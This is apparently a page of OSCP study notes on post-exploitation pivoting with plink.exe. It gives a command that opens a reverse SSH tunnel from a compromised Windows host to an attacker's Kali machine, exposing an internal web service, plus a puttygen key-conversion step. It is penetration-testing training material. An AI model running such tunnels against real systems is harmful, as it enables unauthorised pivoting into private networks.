> For the complete documentation index, see [llms.txt](https://oscp.adot8.com/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://oscp.adot8.com/post-exploitation/pivoting/good-to-know/plink.exe.md).

# Plink.exe

## Overview

Pink.exe explained [here](/windows-privilege-escalation/stored-passwords-and-port-forwarding.md#port-forwarding)

## Reverse SSH Connection with plink.exe (STILL A NO NO)

For example, if we have access to 172.16.0.5 and would like to forward a connection to 172.16.0.10:80 back to port 8000 our own attacking machine (172.16.0.20), we could use this command

```powerquery
cmd.exe /c echo y | .\plink.exe -R 8000:172.16.0.10:80 kali@172.16.0.20 -i KEYFILE -N
```

You will have to convert the **ssh-keygen** files using **puttygen**

```bash
puttygen KEYFILE -o OUTPUT_KEY.ppk
```
